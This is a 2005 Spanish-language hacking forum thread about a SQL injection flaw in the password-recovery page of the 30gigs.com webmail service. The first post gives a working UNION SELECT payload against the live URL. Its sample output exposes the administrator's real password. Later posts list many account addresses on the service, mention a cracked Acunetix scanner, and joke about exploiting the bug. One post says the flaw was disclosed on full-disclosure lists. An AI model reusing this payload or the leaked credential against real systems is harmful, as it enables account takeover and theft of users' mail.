 Autor
|
Tema: [OB] 30gigs SQL injection vulnerability (Leído 7,842 veces)
|
mousehack
 Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
Existe una vulnerabilidad en el servicio de mail de 30gigs que permite el acceso a las contraseñas Esta vulnerabilidad se encuentra en: http://www.30gigs.com/getpassword/debido a que no valida correctamente los datos ingresados por los usuarios. Prueba de Concepto: ------------------------ ingresamos en http://www.30gigs.com/getpassword/y pegamos lo siguiente: not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin producira un resultado como el siguiente, donde ¨runsit" es la contraseña de la cuenta del administrador: We have sent the password for your not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin@30gigs.com account to runsit otras pruebas son admisibles Fuente: www.addict3d.orgSalu2 |
|
|
|
« Última modificación: 31 Diciembre 2005, 08:23 por Sirdarckcat »
|
En línea
|
|
|
|
|
Kasswed
|
Siguen saliendo fallos en 30gigs... a este paso... xD
Saludos!
|
|
|
|
|
En línea
|
"He who allows himself to be insulted, deserves to be." Repórtame cualquier falta a las normas del foro por mensaje privado. |
|
|
|
Man-In-the-Middle
|
god@30gigs.com , admin@30gigs.com , info@30gigs.com , test@30gigs.com , frank@30gigs.com , popeye@30gigs.com , human@30gigs.com , friend@30gigs.com , steven@30gigs.com , bob@30gigs.com , jim@30gigs.com , administrator@30gigs.com , jobs@30gigs.com , happy@30gigs.com , someone@30gigs.com , anyone@30gigs.com , you@30gigs.com , me@30gigs.com , emai@30gigs.com , account@30gigs.com , invite@30gigs.com Me parece un abuso XD, y yo que tenia una cuenta y ese era mi pass para todo,
|
|
|
|
« Última modificación: 18 Noviembre 2005, 21:30 por Man-In-the-Middle »
|
En línea
|
|
|
|
|
krispin
|
Vaya vaya,
esos de 30gigs son una cuadrilla de pencos,
joe,
pa rato me hago una cuenta.
algun dia pararan de salirles fallos increibles?
|
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
jajajaj usas el mismo scaner que yo...XD, lastima que lo tengo crackeado y no me actualiza la base de datos  Salu2 |
|
|
|
|
En línea
|
|
|
|
|
Rey11
|
Cual es ese escaner??
|
|
|
|
|
En línea
|
|
|
|
|
krispin
|
jeje, yo tambien lo he buscado,
pon en la mula acunetix
|
|
|
|
|
En línea
|
|
|
|
|
ANELKAOS
|
Funciona perfectamente  |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
|
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
|
|
|
|
« Última modificación: 18 Noviembre 2005, 23:02 por mousehack »
|
En línea
|
|
|
|
|
ANELKAOS
|
En realidad ya les avisaron hace 2 semanas pero los de 30gigs.com no respondieron, a mi Gmail taró un solo dia pero bueno.... hay empresas responsables y otras...no tanto. [...]The site has been notified about the vulnerability 2 weeks hago, but no response was taken. FUENTE Y DESCUBRIDOR: http://seclists.org/lists/fulldisclosure/2005/Nov/0523.htmlNosotros ya lo avisamos! [...]Nosotros hemos conseguido llegar al mismo resultado de tres formas distintas, las otras dos bastante mas simples, con lo que fácilmente se deduce que esto es un multibug, y un error de diseño. Con todas estas pistas no tardarán en salir nuevos métodos. FUENTE: http://www.elhacker.net/gmailbug/ |
|
|
|
« Última modificación: 18 Noviembre 2005, 23:47 por ANELKAOS »
|
En línea
|
|
|
|
: : : Sherneyko : : :
Desconectado
Mensajes: 194
Solo el eco del silencio mis palabras oira...
|
con esos bugs es mejor tener una cuenta que reenvie a la nuestra en 30gigs.com , y no emviar desde 30gigs.com
hace cuanto se descubrio el bug?
|
|
|
|
|
En línea
|
Benedictus Vir Qui Suffert Tentationem Quoninam Quum Probates Fuerit Acipient Coronam Vitae.
Todos tienen un universo dentro de si...y esos universos sumados componen la realidad que pisamos
|
|
|
yagami2k2
Desconectado
Mensajes: 294
|
Así que todas las cuentas corren peligro ... que mal(mmm....suena muy tentador XD) Suerte que no tengo nada importante en esa cuenta... hay empresas responsables y otras...no tanto Toda la razón, y esta parece que no ha tomado conciencia sobre lo que implica tener un bug como ese. |
|
|
|
« Última modificación: 19 Noviembre 2005, 22:45 por yagami2k2 »
|
En línea
|
We have the power
|
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 4.006
Primero la música y luego las palabras...
|
Valla valla con esta gente...
Ahora se esta dando mucho esto....
El acunetix ese funciona bien?
|
|
|
|
|
En línea
|
"El arte está hecho para ser sentido y no para ser comprendido. Por eso, cada vez que se quiere hablar de él según la inteligencia, no se dicen mas que tonterías" Remy D Gourmont
|
|
|
Maximiliano Jose
Desconectado
Mensajes: 35
MaxBox
|
vaya vaya con esta gente...
Ahora se esta dando mucho esto....
El acunetix ese funciona bien?
Al parecer si... SAludos
|
|
|
|
|
En línea
|
Arrenkemos, ahi viene dios!
|
|
|
|
 |
o si?
